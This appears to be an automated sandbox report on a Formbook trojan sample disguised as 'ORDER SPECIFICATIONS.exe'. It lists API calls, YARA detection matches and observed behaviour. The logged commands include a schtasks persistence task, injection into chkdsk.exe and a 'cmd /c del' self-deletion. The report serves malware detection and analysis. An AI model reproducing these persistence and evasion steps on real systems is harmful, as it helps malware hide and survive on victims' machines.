            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015099D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0150B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015098A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0150A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509A10 NtQuerySection,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509560 NtWriteFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0150AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015095F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0150A770 NtOpenThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509760 NtOpenProcess,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0150A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015096D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055895D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055896D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589560 NtWriteFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0558AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055899D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055895F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0558B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055898F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055898A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0558A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0558A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0558A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_055897A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05589A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB81B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB82E0 NtClose,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB8260 NtReadFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB8390 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB81AB NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BB838A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 0_2_07252FD0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 0_2_07250040
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 0_2_07252FC0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 0_2_07250D83
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00401030
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041BB65
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041CB93
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00408C50
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00408C0A
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041C42D
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041B496
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041C509
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041C515
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00402D8D
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00402D90
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041BEFC
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014CF900
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014E4120
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01581002
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0159E824
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015928EC
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014DB090
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014F20A0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015920A8
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01592B28
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015803DA
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0158DBD2
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014FEBB0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015922AE
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01591D55
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01592D07
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014C0D20
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015925DD
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014DD5E0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014F2581
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0158D466
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014D841F
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0159DFCE
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01591FF1
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0158D616
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_014E6E30
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01592EF7
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05611D55
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0554F900
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05540D20
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05564120
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0555D5E0
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05572581
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0555841F
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05601002
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0555B090
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0557EBB0
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05566E30
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BBCB93
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BBBB65
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BBB496
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BA8C0A
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BA8C50
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BA2D90
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BA2D8D
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BBC515
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BBC509
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_00BA2FB0
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0554B150 appears 32 times
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: String function: 014CB150 appears 45 times
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263259287.0000000008E10000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261776702.00000000071D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261503180.0000000007010000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000000.230240287.0000000000718000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254790320.0000000002B49000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000004.00000000.251795552.00000000001D8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.299165468.000000000174F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.297762999.0000000000B38000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298398176.0000000001486000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe | Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: ORDER SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: LvZiFDk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: ORDER SPECIFICATIONS.exe, LogIn.csBase64 encoded string:
            Source: LvZiFDk.exe.0.dr, LogIn.csBase64 encoded string:
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csBase64 encoded string:
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csBase64 encoded string:
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csBase64 encoded string:
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csBase64 encoded string:
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.csBase64 encoded string:
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.csBase64 encoded string:
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/4@12/8
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Roaming\LvZiFDk.exe
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDA15.tmp
            Source: ORDER SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: ORDER SPECIFICATIONS.exeVirustotal: Detection: 30%
            Source: ORDER SPECIFICATIONS.exeReversingLabs: Detection: 14%
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile read: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: ORDER SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ORDER SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
